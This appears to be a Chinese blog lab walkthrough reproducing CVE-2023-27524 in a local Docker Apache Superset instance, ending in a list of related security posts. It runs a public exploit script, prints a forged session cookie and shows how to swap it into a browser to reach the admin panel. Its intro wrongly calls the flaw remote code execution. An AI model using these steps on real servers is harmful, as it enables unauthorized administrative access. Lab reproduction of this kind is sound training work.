ApacheSuperset CVE-2023-27524

前言:CVE-2023-27524 是一种远程代码执行漏洞,攻击者通过该漏洞可在受影响系统上执行任意代码,从而获得未授权访问权

CVE-2023-27524 GitHubhttps://github.com/horizon3ai/CVE-2023-27524

任务一 代理 | 拉取镜像

复制代码
vi /etc/proxychains4.conf
//最下面修改真机IP端口
复制代码
docker compose up -d
docker ps
//拉取成功后查看8088就是服务器端口

任务二 python 问题解决

复制代码
python3 CVE-2023-27524.py --url 192.168.247.139:8088 --id 1 --validate
//发现缺少 'flask_unsign'
复制代码
python3 -m venv myenv
source myenv/bin/activate
//创建并激活一个虚拟环境

//安装 flask-unsign
proxychains4 pip install flask-unsign

任务三 生成cookie

复制代码
python3 CVE-2023-27524.py --url 192.168.247.139:8088 --id 1 --validate
//下面这样就是安装成功了

【eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.aEAshA.TmTRYFed6TPxFmeOmLRrQAXX3vc】

任务四 替换cookie

复制代码
//随便下载一个cookie的小插件 我用的是cookieManage
复制代码
//替换进去保存,刷新一下就进管理界面了

任务五 实验结束

相关推荐
这儿有一堆花1 小时前
安全访问家中 Linux 服务器的远程方案 —— 专为单用户场景设计
linux·服务器·安全
上海云盾第一敬业销售4 小时前
高防IP可以防护什么攻击类型?企业网络安全的第一道防线
网络·tcp/ip·web安全
饮长安千年月4 小时前
JavaSec-SpringBoot框架
java·spring boot·后端·计算机网络·安全·web安全·网络安全
大咖分享课5 小时前
容器安全最佳实践:云原生环境下的零信任架构实施
安全·云原生·架构
恰薯条的屑海鸥6 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第九期-Unsafe Fileupload模块)(yakit方式)
网络·学习·安全·web安全·渗透测试·csrf·网络安全学习
Bruce_Liuxiaowei6 小时前
Web安全深度解析:源码泄漏与未授权访问漏洞全指南
安全·web安全
代码搬运媛7 小时前
React 中 HTML 插入的全场景实践与安全指南
安全·react.js·html
珹洺9 小时前
数据库系统概论(十七)超详细讲解数据库规范化与五大范式(从函数依赖到多值依赖,再到五大范式,附带例题,表格,知识图谱对比带你一步步掌握)
java·数据库·sql·安全·oracle
网安INF9 小时前
CVE-2023-25194源码分析与漏洞复现(Kafka JNDI注入)
java·web安全·网络安全·kafka·漏洞·jndi注入